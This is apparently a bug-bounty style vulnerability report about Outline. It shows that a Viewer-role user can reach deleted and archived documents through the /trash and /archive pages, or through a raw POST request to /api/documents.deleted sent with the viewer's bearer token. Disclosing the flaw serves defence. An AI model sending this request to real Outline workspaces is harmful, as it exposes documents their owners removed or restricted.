Description

Once a document is archived or deletec, there is no way to access it through the UI or the Document link. But, the API gives the file information and content. This is same with archived files.

Proof of Concept

1. Give a user Viewer role.
2. Visit https://your.getoutline.com/trash or https://you.getoutline.com/archive as a viewer (GUI doesn't have link to archive and trash pages and any archived or deleted document URL returns Not Found messages unless we open it via the gives URLs (/trash and /archive))
3. or Send the following HTTP request with viewer's accessToken:

POST /api/documents.deleted HTTP/1.1
Host: softwarica.getoutline.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Origin: https://you.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer <token>
Connection: close


{"limit":25,"offset":0}

Impact

Unauthorized access to deleted and archived documents and its contents